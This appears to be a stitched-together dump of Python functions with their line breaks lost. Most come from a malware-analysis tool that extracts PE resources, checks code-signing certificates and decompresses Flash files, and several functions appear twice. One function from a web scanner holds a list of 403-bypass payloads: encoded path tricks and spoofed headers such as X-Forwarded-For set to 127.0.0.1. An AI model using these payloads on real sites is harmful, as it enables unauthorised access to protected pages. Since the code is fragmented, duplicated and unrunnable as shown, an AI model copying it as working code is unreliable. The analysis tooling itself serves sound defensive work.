def get_resources(pe): resources = [] if hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'): count = 1 for resource_type in pe.DIRECTORY_ENTRY_RESOURCE.entries: try: resource = {} if resource_type.name is not None: name = str(resource_type.name) else: name = str(pefile.RESOURCE_TYPE.get(resource_type.struct.Id)) if name is None: name = str(resource_type.struct.Id) if hasattr(resource_type, 'directory'): for resource_id in resource_type.directory.entries: if hasattr(resource_id, 'directory'): for resource_lang in resource_id.directory.entries: data = pe.get_data(resource_lang.data.struct.OffsetToData, resource_lang.data.struct.Size) filetype = get_type(data) md5 = get_md5(data) language = pefile.LANG.get(resource_lang.data.lang, None) sublanguage = pefile.get_sublang_name_for_lang(resource_lang.data.lang, resource_lang.data.sublang) offset = ('%-8s' % hex(resource_lang.data.struct.OffsetToData)).strip() size = ('%-8s' % hex(resource_lang.data.struct.Size)).strip() resource = [count, name, offset, md5, size, filetype, language, sublanguage] # Dump resources if requested to and if the file currently being # processed is the opened session file. # This is to avoid that during a --scan all the resources being # scanned are dumped as well. if (self.args.open or self.args.dump) and pe == self.pe: if self.args.dump: folder = self.args.dump else: folder = tempfile.mkdtemp() resource_path = os.path.join(folder, '{0}_{1}_{2}'.format(__sessions__.current.file.md5, offset, name)) resource.append(resource_path) with open(resource_path, 'wb') as resource_handle: resource_handle.write(data) resources.append(resource) count += 1 except Exception as e: self.log('error', e) continue return resources
def get_signed_samples(current=None, cert_filter=None): db = Database() samples = db.find(key='all') results = [] for sample in samples: # Skip if it's the same file. if current: if sample.sha256 == current: continue # Obtain path to the binary. sample_path = get_sample_path(sample.sha256) if not os.path.exists(sample_path): continue # Open PE instance. try: cur_pe = pefile.PE(sample_path) except: continue cur_cert_data = get_certificate(cur_pe) if not cur_cert_data: continue cur_cert_md5 = get_md5(cur_cert_data) if cert_filter: if cur_cert_md5 == cert_filter: results.append([sample.name, sample.md5]) else: results.append([sample.name, sample.md5, cur_cert_md5]) return results
def decompress(self, dump_dir): # Check if the file type is right. # TODO: this might be a bit hacky, need to verify whether malformed # Flash exploit would get a different file type. if 'Flash' not in __sessions__.current.file.type: self.log( 'error', "The opened file doesn't appear to be a valid SWF object") return # Retrieve key information from the opened SWF file. header, version, size, data = self.parse_swf() # Decompressed data. decompressed = None # Check if the file is already a decompressed Flash object. if header == 'FWS': self.log('info', "The opened file doesn't appear to be compressed") return # Check if the file is compressed with zlib. elif header == 'CWS': self.log('info', "The opened file appears to be compressed with Zlib") # Open an handle on the compressed data. compressed = StringIO(data) # Skip the header. compressed.read(3) # Decompress and reconstruct the Flash object. decompressed = 'FWS' + compressed.read(5) + zlib.decompress( compressed.read()) # Check if the file is compressed with lzma. elif header == 'ZWS': self.log('info', "The opened file appears to be compressed with Lzma") # We need an third party library to decompress this. if not HAVE_PYLZMA: self.log( 'error', "Missing dependency, please install pylzma (`pip install pylzma`)" ) return # Open and handle on the compressed data. compressed = StringIO(data) # Skip the header. compressed.read(3) # Decompress with pylzma and reconstruct the Flash object. ## ZWS(LZMA) ## | 4 bytes | 4 bytes | 4 bytes | 5 bytes | n bytes | 6 bytes | ## | 'ZWS'+version | scriptLen | compressedLen | LZMA props | LZMA data | LZMA end marker | decompressed = 'FWS' + compressed.read(5) compressed.read(4) # skip compressedLen decompressed += pylzma.decompress(compressed.read()) # If we obtained some decompressed data, we print it and eventually # dump it to file. if decompressed: # Print the decompressed data # TODO: this prints too much, need to find a better wayto display # this. Paginate? self.log('', cyan(hexdump(decompressed))) if dump_dir: # Dump the decompressed SWF file to the specified directory # or to the default temporary one. dump_path = os.path.join( dump_dir, '{0}.swf'.format(get_md5(decompressed))) with open(dump_path, 'wb') as handle: handle.write(decompressed) self.log('info', "Flash object dumped at {0}".format(dump_path)) # Directly open a session on the dumped Flash object. __sessions__.new(dump_path)
def decompress(self, dump_dir): # Check if the file type is right. # TODO: this might be a bit hacky, need to verify whether malformed # Flash exploit would get a different file type. if 'Flash' not in __sessions__.current.file.type: self.log('error', "The opened file doesn't appear to be a valid SWF object") return # Retrieve key information from the opened SWF file. header, version, size, data = self.parse_swf() # Decompressed data. decompressed = None # Check if the file is already a decompressed Flash object. if header == 'FWS': self.log('info', "The opened file doesn't appear to be compressed") return # Check if the file is compressed with zlib. elif header == 'CWS': self.log('info', "The opened file appears to be compressed with Zlib") # Open an handle on the compressed data. compressed = StringIO(data) # Skip the header. compressed.read(3) # Decompress and reconstruct the Flash object. decompressed = 'FWS' + compressed.read(5) + zlib.decompress(compressed.read()) # Check if the file is compressed with lzma. elif header == 'ZWS': self.log('info', "The opened file appears to be compressed with Lzma") # We need an third party library to decompress this. if not HAVE_PYLZMA: self.log('error', "Missing dependency, please install pylzma (`pip install pylzma`)") return # Open and handle on the compressed data. compressed = StringIO(data) # Skip the header. compressed.read(3) # Decompress with pylzma and reconstruct the Flash object. ## ZWS(LZMA) ## | 4 bytes | 4 bytes | 4 bytes | 5 bytes | n bytes | 6 bytes | ## | 'ZWS'+version | scriptLen | compressedLen | LZMA props | LZMA data | LZMA end marker | decompressed = 'FWS' + compressed.read(5) compressed.read(4) # skip compressedLen decompressed += pylzma.decompress(compressed.read()) # If we obtained some decompressed data, we print it and eventually # dump it to file. if decompressed: # Print the decompressed data # TODO: this prints too much, need to find a better wayto display # this. Paginate? self.log('', cyan(hexdump(decompressed))) if dump_dir: # Dump the decompressed SWF file to the specified directory # or to the default temporary one. dump_path = os.path.join(dump_dir, '{0}.swf'.format(get_md5(decompressed))) with open(dump_path, 'wb') as handle: handle.write(decompressed) self.log('info', "Flash object dumped at {0}".format(dump_path)) # Directly open a session on the dumped Flash object. __sessions__.new(dump_path)
def bypass_403(self, resp, timeout=20): OriginalUrl = resp.request.path_url Rurl = resp.request.path_url if OriginalUrl == "/SScan-404-existence-check": return if Rurl != "/": Rurl = resp.request.path_url.rstrip("/") PreviousPath = '/'.join(str(Rurl).split('/')[:-1]) LastPath = str(Rurl).split('/')[-1] payloads = [ "%2e/" + LastPath, "%2f/" + LastPath, LastPath + "/.", LastPath + "/./.", LastPath + "/././", LastPath + "/./", "./" + LastPath + "/./", LastPath + "%20/", LastPath + "%09/", "%20" + LastPath + "%20/", LastPath + "/..;/", LastPath + "..;/", LastPath + "?", LastPath + "??", LastPath + "???", LastPath + "//", LastPath + "/*", LastPath + "/*/", "/" + LastPath + "//", LastPath + "/", LastPath + "/.randomstring" ] hpayloads = [{ "X-Rewrite-URL": OriginalUrl }, { "X-Original-URL": OriginalUrl }, { "Referer": "/" + LastPath }, { "X-Custom-IP-Authorization": "127.0.0.1" }, { "X-Originating-IP": "127.0.0.1" }, { "X-Forwarded-For": "127.0.0.1" }, { "X-Remote-IP": "127.0.0.1" }, { "X-Client-IP": "127.0.0.1" }, { "X-Host": "127.0.0.1" }, { "X-Forwarded-Host": "127.0.0.1" }] for p in payloads: url = PreviousPath + "/" + p resp_p = self.session.get(self.base_url + url, allow_redirects=False, headers=setting.default_headers, timeout=timeout, verify=False) # 当状态码为200时,且该页面的 md5 值不与首页相等时,认为可以绕过403 if resp_p.status_code == 200 and self.index_md5 != get_md5( resp_p, setting.default_headers): if OriginalUrl not in self.results: self.results[OriginalUrl] = [] _ = { 'status': resp.status_code, 'url': '%s%s' % (self.base_url, OriginalUrl), 'title': '绕过payload: %s%s' % (self.base_url, url), 'vul_type': "403绕过" } if _ not in self.results[OriginalUrl]: self.results[OriginalUrl].append(_) break for hp in hpayloads: # 这个headers 是为了防止update时,连续添加入字典,不能使用setting.default_headers,不然会连续增加,setting.default_headers会发生变化 headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36", "Connection": "close", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" } key, = hp new_url = "" if key == "X-Original-URL": new_url = Rurl + "4nyth1ng" if key == "X-Rewrite-URL": new_url = "/" # Add header headers.update(hp) if new_url: url = new_url else: url = OriginalUrl resp_hp = self.session.get(self.base_url + url, allow_redirects=False, headers=headers, timeout=timeout, verify=False) # 当状态码为200时,且该页面的 md5 值不与首页相等时,认为可以绕过403 if resp_hp.status_code == 200 and self.index_md5 != get_md5( resp_hp, headers): if OriginalUrl not in self.results: self.results[OriginalUrl] = [] _ = { 'status': resp.status_code, 'url': '%s%s' % (self.base_url, OriginalUrl), 'title': '绕过payload: %s%s, Header payload: %s' % (self.base_url, url, hp), 'vul_type': "403绕过" } if _ not in self.results[OriginalUrl]: self.results[OriginalUrl].append(_) # print(_) break
def security(self): def get_certificate(pe): # TODO: this only extract the raw list of certificate data. # I need to parse them, extract single certificates and perhaps return # the PEM data of the first certificate only. pe_security_dir = pefile.DIRECTORY_ENTRY[ 'IMAGE_DIRECTORY_ENTRY_SECURITY'] address = pe.OPTIONAL_HEADER.DATA_DIRECTORY[ pe_security_dir].VirtualAddress # size = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pe_security_dir].Size if address: return pe.write()[address + 8:] else: return None def get_signed_samples(current=None, cert_filter=None): db = Database() samples = db.find(key='all') results = [] for sample in samples: # Skip if it's the same file. if current: if sample.sha256 == current: continue # Obtain path to the binary. sample_path = get_sample_path(sample.sha256) if not os.path.exists(sample_path): continue # Open PE instance. try: cur_pe = pefile.PE(sample_path) except: continue cur_cert_data = get_certificate(cur_pe) if not cur_cert_data: continue cur_cert_md5 = get_md5(cur_cert_data) if cert_filter: if cur_cert_md5 == cert_filter: results.append([sample.name, sample.md5]) else: results.append([sample.name, sample.md5, cur_cert_md5]) return results if self.args.all: self.log('info', "Scanning the repository for all signed samples...") all_of_them = get_signed_samples() self.log('info', "{0} signed samples found".format(bold(len(all_of_them)))) if len(all_of_them) > 0: self.log( 'table', dict(header=['Name', 'MD5', 'Cert MD5'], rows=all_of_them)) return if not self.__check_session(): return cert_data = get_certificate(self.pe) if not cert_data: self.log('warning', "No certificate found") return cert_md5 = get_md5(cert_data) self.log('info', "Found certificate with MD5 {0}".format(bold(cert_md5))) if self.args.dump: cert_path = os.path.join( self.args.dump, '{0}.crt'.format(__sessions__.current.file.sha256)) with open(cert_path, 'wb+') as cert_handle: cert_handle.write(cert_data) self.log('info', "Dumped certificate to {0}".format(cert_path)) self.log( 'info', "You can parse it using the following command:\n\t" + bold("openssl pkcs7 -inform DER -print_certs -text -in {0}". format(cert_path))) # TODO: do scan for certificate's serial number. if self.args.scan: self.log('info', "Scanning the repository for matching signed samples...") matches = get_signed_samples( current=__sessions__.current.file.sha256, cert_filter=cert_md5) self.log('info', "{0} relevant matches found".format(bold(len(matches)))) if len(matches) > 0: self.log('table', dict(header=['Name', 'SHA256'], rows=matches)) # TODO: this function needs to be better integrated with the rest of the command. # TODO: need to add more error handling and figure out why so many samples are failing. if self.args.check: if not HAVE_VERIFYSIGS: self.log( 'error', "Dependencies missing for authenticode validation. Please install M2Crypto and pyasn1 (`pip install pyasn1 M2Crypto`)" ) return try: auth, computed_content_hash = get_auth_data( __sessions__.current.file.path) except Exception as e: self.log('error', "Unable to parse PE certificate: {0}".format(str(e))) return try: auth.ValidateAsn1() auth.ValidateHashes(computed_content_hash) auth.ValidateSignatures() auth.ValidateCertChains(time.gmtime()) except Exception, e: self.log( 'error', "Unable to validate PE certificate: {0}".format(str(e))) return self.log('info', bold('Signature metadata:')) self.log('info', 'Program name: {0}'.format(auth.program_name)) self.log('info', 'URL: {0}'.format(auth.program_url)) if auth.has_countersignature: self.log( 'info', bold('Countersignature is present. Timestamp: {0} UTC'. format( time.asctime(time.gmtime( auth.counter_timestamp))))) else: self.log('info', bold('Countersignature is not present.')) self.log('info', bold('Binary is signed with cert issued by:')) self.log('info', '{0}'.format(auth.signing_cert_id[0])) self.log('info', '{0}'.format(auth.cert_chain_head[2][0])) self.log( 'info', 'Chain not before: {0} UTC'.format( time.asctime(time.gmtime(auth.cert_chain_head[0])))) self.log( 'info', 'Chain not after: {0} UTC'.format( time.asctime(time.gmtime(auth.cert_chain_head[1])))) if auth.has_countersignature: self.log('info', bold('Countersig chain head issued by:')) self.log('info', '{0}'.format(auth.counter_chain_head[2])) self.log( 'info', 'Countersig not before: {0} UTC'.format( time.asctime(time.gmtime(auth.counter_chain_head[0])))) self.log( 'info', 'Countersig not after: {0} UTC'.format( time.asctime(time.gmtime(auth.counter_chain_head[1])))) self.log('info', bold('Certificates:')) for (issuer, serial), cert in auth.certificates.items(): self.log('info', 'Issuer: {0}'.format(issuer)) self.log('info', 'Serial: {0}'.format(serial)) subject = cert[0][0]['subject'] subject_dn = str(dn.DistinguishedName.TraverseRdn(subject[0])) self.log('info', 'Subject: {0}'.format(subject_dn)) not_before = cert[0][0]['validity']['notBefore'] not_after = cert[0][0]['validity']['notAfter'] not_before_time = not_before.ToPythonEpochTime() not_after_time = not_after.ToPythonEpochTime() self.log( 'info', 'Not Before: {0} UTC ({1})'.format( time.asctime(time.gmtime(not_before_time)), not_before[0])) self.log( 'info', 'Not After: {0} UTC ({1})'.format( time.asctime(time.gmtime(not_after_time)), not_after[0])) if auth.trailing_data: self.log( 'info', 'Signature Blob had trailing (unvalidated) data ({0} bytes): {1}' .format(len(auth.trailing_data), auth.trailing_data.encode('hex')))
def get_resources(pe): resources = [] if hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'): count = 1 for resource_type in pe.DIRECTORY_ENTRY_RESOURCE.entries: try: resource = {} if resource_type.name is not None: name = str(resource_type.name) else: name = str( pefile.RESOURCE_TYPE.get( resource_type.struct.Id)) if name is None: name = str(resource_type.struct.Id) if hasattr(resource_type, 'directory'): for resource_id in resource_type.directory.entries: if hasattr(resource_id, 'directory'): for resource_lang in resource_id.directory.entries: data = pe.get_data( resource_lang.data.struct. OffsetToData, resource_lang.data.struct.Size) filetype = get_type(data) md5 = get_md5(data) language = pefile.LANG.get( resource_lang.data.lang, None) sublanguage = pefile.get_sublang_name_for_lang( resource_lang.data.lang, resource_lang.data.sublang) offset = ('%-8s' % hex(resource_lang.data.struct .OffsetToData)).strip() size = ( '%-8s' % hex(resource_lang.data.struct.Size) ).strip() resource = [ count, name, offset, md5, size, filetype, language, sublanguage ] # Dump resources if requested to and if the file currently being # processed is the opened session file. # This is to avoid that during a --scan all the resources being # scanned are dumped as well. if (self.args.open or self.args.dump ) and pe == self.pe: if self.args.dump: folder = self.args.dump else: folder = tempfile.mkdtemp() resource_path = os.path.join( folder, '{0}_{1}_{2}'.format( __sessions__.current.file. md5, offset, name)) resource.append(resource_path) with open(resource_path, 'wb') as resource_handle: resource_handle.write(data) resources.append(resource) count += 1 except Exception as e: self.log('error', e) continue return resources
def security(self): def get_certificate(pe): # TODO: this only extract the raw list of certificate data. # I need to parse them, extract single certificates and perhaps return # the PEM data of the first certificate only. pe_security_dir = pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY'] address = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pe_security_dir].VirtualAddress # size = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pe_security_dir].Size if address: return pe.write()[address + 8:] else: return None def get_signed_samples(current=None, cert_filter=None): db = Database() samples = db.find(key='all') results = [] for sample in samples: # Skip if it's the same file. if current: if sample.sha256 == current: continue # Obtain path to the binary. sample_path = get_sample_path(sample.sha256) if not os.path.exists(sample_path): continue # Open PE instance. try: cur_pe = pefile.PE(sample_path) except: continue cur_cert_data = get_certificate(cur_pe) if not cur_cert_data: continue cur_cert_md5 = get_md5(cur_cert_data) if cert_filter: if cur_cert_md5 == cert_filter: results.append([sample.name, sample.md5]) else: results.append([sample.name, sample.md5, cur_cert_md5]) return results if self.args.all: self.log('info', "Scanning the repository for all signed samples...") all_of_them = get_signed_samples() self.log('info', "{0} signed samples found".format(bold(len(all_of_them)))) if len(all_of_them) > 0: self.log('table', dict(header=['Name', 'MD5', 'Cert MD5'], rows=all_of_them)) return if not self.__check_session(): return cert_data = get_certificate(self.pe) if not cert_data: self.log('warning', "No certificate found") return cert_md5 = get_md5(cert_data) self.log('info', "Found certificate with MD5 {0}".format(bold(cert_md5))) if self.args.dump: cert_path = os.path.join(self.args.dump, '{0}.crt'.format(__sessions__.current.file.sha256)) with open(cert_path, 'wb+') as cert_handle: cert_handle.write(cert_data) self.log('info', "Dumped certificate to {0}".format(cert_path)) self.log('info', "You can parse it using the following command:\n\t" + bold("openssl pkcs7 -inform DER -print_certs -text -in {0}".format(cert_path))) # TODO: do scan for certificate's serial number. if self.args.scan: self.log('info', "Scanning the repository for matching signed samples...") matches = get_signed_samples(current=__sessions__.current.file.sha256, cert_filter=cert_md5) self.log('info', "{0} relevant matches found".format(bold(len(matches)))) if len(matches) > 0: self.log('table', dict(header=['Name', 'SHA256'], rows=matches)) # TODO: this function needs to be better integrated with the rest of the command. # TODO: need to add more error handling and figure out why so many samples are failing. if self.args.check: if not HAVE_VERIFYSIGS: self.log('error', "Dependencies missing for authenticode validation. Please install M2Crypto and pyasn1 (`pip install pyasn1 M2Crypto`)") return try: auth, computed_content_hash = get_auth_data(__sessions__.current.file.path) except Exception as e: self.log('error', "Unable to parse PE certificate: {0}".format(str(e))) return try: auth.ValidateAsn1() auth.ValidateHashes(computed_content_hash) auth.ValidateSignatures() auth.ValidateCertChains(time.gmtime()) except Exception, e: self.log('error', "Unable to validate PE certificate: {0}".format(str(e))) return self.log('info', bold('Signature metadata:')) self.log('info', 'Program name: {0}'.format(auth.program_name)) self.log('info', 'URL: {0}'.format(auth.program_url)) if auth.has_countersignature: self.log('info', bold('Countersignature is present. Timestamp: {0} UTC'.format( time.asctime(time.gmtime(auth.counter_timestamp))))) else: self.log('info', bold('Countersignature is not present.')) self.log('info', bold('Binary is signed with cert issued by:')) self.log('info', '{0}'.format(auth.signing_cert_id[0])) self.log('info', '{0}'.format(auth.cert_chain_head[2][0])) self.log('info', 'Chain not before: {0} UTC'.format( time.asctime(time.gmtime(auth.cert_chain_head[0])))) self.log('info', 'Chain not after: {0} UTC'.format( time.asctime(time.gmtime(auth.cert_chain_head[1])))) if auth.has_countersignature: self.log('info', bold('Countersig chain head issued by:')) self.log('info', '{0}'.format(auth.counter_chain_head[2])) self.log('info', 'Countersig not before: {0} UTC'.format( time.asctime(time.gmtime(auth.counter_chain_head[0])))) self.log('info', 'Countersig not after: {0} UTC'.format( time.asctime(time.gmtime(auth.counter_chain_head[1])))) self.log('info', bold('Certificates:')) for (issuer, serial), cert in auth.certificates.items(): self.log('info', 'Issuer: {0}'.format(issuer)) self.log('info', 'Serial: {0}'.format(serial)) subject = cert[0][0]['subject'] subject_dn = str(dn.DistinguishedName.TraverseRdn(subject[0])) self.log('info', 'Subject: {0}'.format(subject_dn)) not_before = cert[0][0]['validity']['notBefore'] not_after = cert[0][0]['validity']['notAfter'] not_before_time = not_before.ToPythonEpochTime() not_after_time = not_after.ToPythonEpochTime() self.log('info', 'Not Before: {0} UTC ({1})'.format( time.asctime(time.gmtime(not_before_time)), not_before[0])) self.log('info', 'Not After: {0} UTC ({1})'.format( time.asctime(time.gmtime(not_after_time)), not_after[0])) if auth.trailing_data: self.log('info', 'Signature Blob had trailing (unvalidated) data ({0} bytes): {1}'.format( len(auth.trailing_data), auth.trailing_data.encode('hex')))